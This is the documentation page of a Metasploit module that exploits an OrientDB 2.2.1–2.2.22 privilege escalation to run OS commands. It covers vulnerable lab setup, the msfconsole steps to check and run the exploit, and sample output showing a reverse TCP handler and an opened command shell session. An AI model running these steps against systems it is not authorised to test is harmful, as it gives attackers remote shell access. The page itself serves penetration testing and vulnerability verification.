This module leverages a privilege escalation on OrientDB to execute unsandboxed OS commands.

All versions from 2.2.1 up to 2.2.22 should be vulnerable.

The module is based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3318

## Vulnerable Application
OrientDB 2.2.1 <= 2.2.22

## Installation
Download a vulnerable OrientDB version here: http://orientdb.com/download-previous/
`$ wget http://orientdb.com/download.php?file=orientdb-community-2.2.20.zip&os=multi`
`$ unzip orientdb-community-2.2.20.zip`
`$ chmod 755 bin/*.sh`
`$ chmod -R 777 config`
`$ cd bin`
`$ ./server.sh`

## References for running OrientDB 
http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Installation.html
http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Run-the-server.html

## References for vulnerability
https://blogs.securiteam.com/index.php/archives/3318
http://www.palada.net/index.php/2017/07/13/news-2112/
https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017

## Verification Steps
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/orientdb_exec`
- [ ]  `set rhost <RHOST>`
- [ ]  `set target <TARGET_NUMBER>`
- [ ]  `set workspace <WORKSPACE>`
- [ ]  `check`
- [ ] **Verify** if the OrientDB instance is vulnerable
- [ ]  `run`
- [ ] **Verify** you get a session

## Example Output
`[LHOST:127.0.0.1][Workspace:default][Jobs:0][Sessions:0][/Users/vibrio] exploit(orientdb_exec) > run`
`[*] [2017.07.18-15:55:47] Started reverse TCP handler on 127.0.0.1:37331`
`[*] [2017.07.18-15:55:49] 127.0.0.1:2480 - Sending payload...`
`[*] Command shell session 1 opened (127.0.0.1:37331 -> 127.0.0.1:46594) at 2017-07-18 15:55:49 +0100`